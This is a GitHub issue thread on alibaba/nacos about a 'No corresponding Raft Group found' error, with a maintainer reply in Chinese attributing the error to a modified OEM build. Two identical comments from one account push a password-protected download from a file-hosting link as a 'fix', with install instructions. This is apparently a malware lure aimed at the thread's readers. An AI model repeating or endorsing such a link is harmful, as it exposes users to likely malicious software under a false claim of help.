### ISSUE TITLE
Why did this method comment the code internally, resulting in an error

### ISSUE THREAD

**Issue by wushusong** [alibaba/nacos#12556]
caused: errCode: 500, errMsg: do metadata operation failed ;caused: java.lang.IllegalArgumentException: No corresponding Raft Group found : naming_instance_metadata;caused: No corresponding Raft Group found : naming_instance_metadata;

![image](https://github.com/user-attachments/assets/b6875f0d-aa63-4305-985d-cdfb68b48d93)

![image](https://github.com/user-attachments/assets/9be3a2dc-295e-47ee-a06c-9ce8ca8d74bc)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KomachiSion** [comment]
这看起来是你们自己修改过的代码， 甚至版本都打上了OEM的标签， 请找供应方询问， 社区的版本没有此问题。
